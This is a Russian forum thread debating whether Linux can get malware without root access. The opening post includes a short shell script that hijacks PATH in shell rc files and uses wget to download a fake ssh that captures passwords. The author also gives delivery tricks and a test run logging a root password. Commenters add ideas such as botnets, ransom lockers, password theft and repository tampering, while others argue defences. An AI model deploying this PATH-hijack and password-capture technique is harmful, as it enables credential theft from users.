LINUX.ORG.RU
ФорумTalks

линукс готов для вирусов?


0

0

решил таки проверить, насколько линукс готов для вирусов.
дано: статья о том, почему на линукс нет и не может быть вирусов, ноутбук с линуксом, текстовый редактор, консоль.
доказать: можно ли исполнить более -менее вредоносный скрипт (НЕ деструктивные функции) без прав рута.
итак, что мы можем сделать без рутовых прав?
1) снести хомяк юзера. не интересно.
2) стырить конфигурационные файлы юзера со сверхсекретнымиданными^Wзашифрованными пятью алгоритмами пароли. да кому же из вирусописателей оно сдалось?
3) подменить вызов системной программы на себя. а что может быть проще этого?
итак, злоумышленник захотел подменить, допустим, ssh.
да легко!
#!/bin/sh
cd
mkdir .bin 2>/dev/null
for i in $(ls -1 *shrc 2>/dev/null); do echo «PATH='~/.bin:/bin:/usr/bin:/sbin:/usr/sbin'» >> $i; done
wget -qO ~/.bin/ssh http://...
и всё! вместо настоящего ssh можно запустить что угодно, тот же баш-скрипт, который будет вопрошать пароль да сливать куда -нибудь, потом просто вызывать /usr/bin/ssh $*.
теперь встает другой вопрос - как подсунуть этот «файл» в четыре строчки по тырнетам.
тут вариантов тоже немного -
1) спрятать их в десяти-тысяче-строчный «полезный» шелл-скрипт ;
2) распространять отдельным исполняемым файлом.
в 1м случае понятно, юзер сам запустит скрипт. а во 2м - как же юзер-НЕхомячок запустит скрипт? ведь браузеры при скачке не дают прав на исполнение! после недолгих экспериментов выяснилось, что при извлечении стандартным XFCEшным архиватором права остаются идентичными тем, какими были до упаковки. (т.е. если кто-то упаковал скрипт с правами на исполнение в архив tar.bz(2), то распаковываемый файл будет с теми же правами, что и до архивации - разве так должно быть?)
а после этого двух кликов достаточно, чтобы «установить» этот скрипт.
«вот такие пироги.» (с)

★★★★★

Ничего нового не открыл

Deleted
()

Годный вброс.

ведь браузеры при скачке не дают прав на исполнение!


Не поверишь, можно обойти это и браузер запустить все что угодно.

итак, что мы можем сделать без рутовых прав?


Не поверишь, но и тут есть обход, начиная с ядра, заканчивая примитивом вроде ftp. А теперь еще недавно взялись и за Gnome/KDE, там тоже полно дыр.

gh0stwizard ★★★★★
()

Как показывает чтение ЛОРа, неплохо себя зарекомендовал самопальный deb-пакет «с новыми красивыми смайликами».

thesis ★★★★★
()

>при извлечении стандартным XFCEшным архиватором права остаются идентичными тем, какими были до упаковки.
Ты говоришь так, как будто это неправильно.
Алсо бред.

x3al ★★★★★
()

>for i in $(ls -1 *shrc 2>/dev/null); do echo «PATH='~/.bin:/bin:/usr/bin:/sbin:/usr/sbin'» >> $i; done

Ну что, попробуй :)

Deleted
()
Ответ на: комментарий от gh0stwizard

>Не поверишь, но и тут есть обход, начиная с ядра,
дашь мне локальный сплоит на 2.6.35?
>заканчивая примитивом вроде ftp.

серверов куча, вы о каком именно? (всю жизнь ставил vsftpd)

А теперь еще недавно взялись и за Gnome/KDE, там тоже полно дыр.

а это хз. ни то, ни то пока не использую.

snoopcat ★★★★★
() автор топика

У меня и на венде вирусов уже несколько лет не встречалось. Если юзер идиот, то ему никакой линукс и антивирус не поможет.

vurdalak ★★★★★
()

> спрятать их в десяти-тысяче-строчный «полезный» шелл-скрипт

ты сам просматриваешь что запускаешь? я - да. и вообще из сторонних скриптов беру обычно только интересующие меня кусочки.

распространять отдельным исполняемым файлом


ты еще скажи репозиторий взломать. никто сторонние бинари качать не будет, чай не венда.

Komintern ★★★★★
()
Ответ на: комментарий от Komintern

>ты еще скажи репозиторий взломать. никто сторонние бинари качать не будет, чай не венда.

Гномлук так не считает

Gary ★★★★★
()
Ответ на: комментарий от Komintern

никто сторонние бинари качать не будет

Ага. Ага.

thesis ★★★★★
()

> итак, что мы можем сделать без рутовых прав?

Включить машину в состав ботнета. Далее по вкусу:
* дальнейшее расширение ботнета
* участие в ddos-атаках
* рассылка спама
* брутфорс локального рута

Manhunt ★★★★★
()
Ответ на: комментарий от Deleted

пробовал же.
$ ./test
OK
$ ssh root@localhost
<тут бред про неизвестные SHA-отпечатки> yes/no? yes
root@localhost's password:
Access denied.
<тут пишем пассворд в текстовый файл и вызываем /usr/bin/ssh $@
root@localhost's password:
Last login: тогда-то, оттудато.
#

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от snoopcat

>дашь мне локальный сплоит на 2.6.35?

50 тыс. баксов готов заплатить?

серверов куча, вы о каком именно? (всю жизнь ставил vsftpd)


Допустим proftpd

а это хз. ни то, ни то пока не использую.


При желании можно и в X.org найти дырки, тогда аудитория заметно расширится.

gh0stwizard ★★★★★
()
Ответ на: комментарий от Manhunt

Ох, чуть не забыл — залочить экран и предложить отправить смс на короткий номер :D

Manhunt ★★★★★
()

потом просто вызывать /usr/bin/ssh $*.

Именно поэтому в правильных дистрибах ssh читает данные только с консоли - скриптом передать пароль нельзя.

Алсо, установка noexec должна спасать от таких вот выкрутасов.

aix27249
()

Это всё фигня. Вот когда приведете пример: воткнули комп в сеть, а через пол часа линукс на нём весь в вирусне, вот тогда можно смело заявить: линукс готов для вирусов!

Zak ★★
()
Ответ на: комментарий от Deleted

> у Ъ права тебе скажут пока-пока

Это у Ъ. Но здесь-то речь идет о дефолтных настройках :)

Manhunt ★★★★★
()
Ответ на: комментарий от Komintern

> никто сторонние бинари качать не будет, чай не венда.

Наивно так думать. Новички с убунтой в руках только и делают, что качают левые бинари.

cruxish ★★★★
()
Ответ на: комментарий от cruxish

>> 1) снести хомяк юзера. не интересно.

Зато эффективно.


Зачем же сразу сносить? Зашифровать. И как обычно: смс на короткий номер.

Manhunt ★★★★★
()
Ответ на: комментарий от gh0stwizard

>А вы тоже верите в невзламываемые системы?

Как в криптостойкие алгоритмы

Gary ★★★★★
()
Ответ на: комментарий от Gary

И кстати, сумма весьма мизирная, по сравнению с тем что можно вынести из нужного места. Или вы думаете все хакеры только и делают, что соревнуются в том кто больше запостить на SF? Они тоже люди, хотят есть, хорошо одеваться, покупать авто и т.п. :)

gh0stwizard ★★★★★
()
Ответ на: комментарий от Rastafarra

>бугага. сливать с 4-мя звездами надо покрасивше.

Да это был юмор. Каков вопрос - таков ответ. Как будто тут сплойтами все делятся. И спорят о невозможности затроянить линукс, ага :)

gh0stwizard ★★★★★
()
Ответ на: комментарий от gh0stwizard

>И кстати, сумма весьма мизирная, по сравнению с тем что можно вынести из нужного места

Но ведь никто не выносит? Потому что не могут

Gary ★★★★★
()
Ответ на: комментарий от Gary

>Но ведь никто не выносит? Потому что не могут

Без комментариев. Особенно радует то, что вы знаете лишь о тех сплойтах, что в паблике. GSM тоже нельзя прослушивать, т.к. никто его не слушает, ага.

gh0stwizard ★★★★★
()
Ответ на: комментарий от aix27249

> Именно поэтому в правильных дистрибах ssh читает данные только с консоли - скриптом передать пароль нельзя.
конечно нельзя. я же сказал: скрипт-левый-ссш спрашивает пароль, потом говорит что он неверен, вызывает /usr/bin/ssh $*, где $* - логин@хост. а оригинальный ссх еще раз запрашивает пароль, а юзер уже его вводит.

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от snoopcat

>конечно нельзя. я же сказал: скрипт-левый-ссш спрашивает пароль, потом говорит что он неверен, вызывает /usr/bin/ssh $*, где $* - логин@хост. а оригинальный ссх еще раз запрашивает пароль, а юзер уже его вводит.

Пароли. А если я использую авторизацию по ключю? :)

gh0stwizard ★★★★★
()
Ответ на: комментарий от Komintern

> ты еще скажи репозиторий взломать. никто сторонние бинари качать не будет, чай не венда.

Репозитории, например, ArchLinux не подписаны. Как и пакеты. :] При желании вполне возможен MitM.

Ruth ★★
()
Ответ на: комментарий от gh0stwizard

... и вот тут -то лже-ссш палит себя, т.к. вместо успешной авторизации по ключу он вопрошает пароль (:
и да, ссш - лишь пример (:

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от Ruth

Или взлом одного из зеркал и подмена репозитория на нем. А к тому времени, как починят зеркало, арчеводы уже успеют накачать много полезных для здоровья обновлений.

Ruth ★★
()
Ответ на: комментарий от thesis

> Как показывает чтение ЛОРа, неплохо себя зарекомендовал самопальный deb-пакет «с новыми красивыми смайликами».


а еще можно запилить темы на (kde|gnome)-look.

isden ★★★★★
()
Ответ на: комментарий от Komintern

> ты еще скажи репозиторий взломать. никто сторонние бинари качать не будет, чай не венда.

зачем? есть же ppa. получаем довольно большую целевую аудиторию.

isden ★★★★★
()
Ответ на: комментарий от Ruth

я арчевод, обновляюсь раз в ~месяц (могу и раз в неделю, и раз в три месяца). пока ничего подобного не было. параноики могут использовать yaourt -Suby. правда есть риск превращение в гентушнега {:

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от gh0stwizard

Без комментариев. Особенно радует то, что вы знаете лишь о тех сплойтах, что в паблике. GSM тоже нельзя прослушивать, т.к. никто его не слушает, ага.

Во-первых, GSM уже взломан. Во-вторых, тем, кому нужно слушать мобильные переговоры, взламывать GSM совсем не нужно. Почитай про СОРМ-1 и СОРМ-2. Hint: на оборудование спецслужб данные поступают в уже декодированном виде. А во время проведения мероприятий городского масштаба шифрование GSM вообще отключают.

Black_Shadow ★★★★★
()
Ответ на: комментарий от KRoN73

да ничего, просто прочитал еще одну статью про то, какая на линуксе офигенная система защиты от дураков (sudo), что на линукс нет и не будет по -настоящему вредных вирусов и.т.д. и мне стало интересно (:

snoopcat ★★★★★
() автор топика
Ответ на: комментарий от Ruth

>Или взлом одного из зеркал и подмена репозитория на нем. А к тому времени, как починят зеркало, арчеводы уже успеют накачать много полезных для здоровья обновлений.

Не успеют - md5 и gpg не зря придумали. Любой нормальный пакетный менеджер защищен от подмены пакета на левый.

codoranro
()
Ответ на: комментарий от snoopcat

>просто прочитал еще одну статью про то, какая на линуксе офигенная система защиты от дураков (sudo), что на линукс нет и не будет по -настоящему вредных вирусов

7 лет назад я через дырку в OpenSSL поймал Slapper'а. И он мне за ночь нагенерировал трафика на сумму в 2-3 тогдашних московских месячных квартплаты ($500 - и то, это провайдер мне на встречу пошёл и по себестоимости трафик отдал, а то было бы $1000).

А уж сколько раз в те же времена через дырки в Апача черви на машину вползали... До сих пор где-то коллекция валяется.

Сейчас, конечно, стало получше, последний раз меня ломали года четыре назад, но исключать вероятность обнаружения очередной хитрой дырки всё равно нельзя.

KRoN73 ★★★★★
()

на мой взгляд, лучшее что можно сделать с юзером - вынести его login keyring и базу сохраненных паролей из Firefox. А потом спамить с его аськи и вконтактика.

codoranro
()
Ответ на: комментарий от snoopcat

> я арчевод, обновляюсь раз в ~месяц (могу и раз в неделю, и раз в три месяца). пока ничего подобного не было.

Так и вирусов под Lin пока не было. Просто я тоже арчевод, и мне довольно забавно иметь зашифрованную флешку, но при этом огромную дыру в репозитории, которая все шифрование может легко нивелировать.

Ruth ★★
()
Ответ на: комментарий от codoranro

> Не успеют - md5 и gpg не зря придумали. Любой нормальный пакетный менеджер защищен от подмены пакета на левый.

В арче нет защиты по gpg. :]

Ruth ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.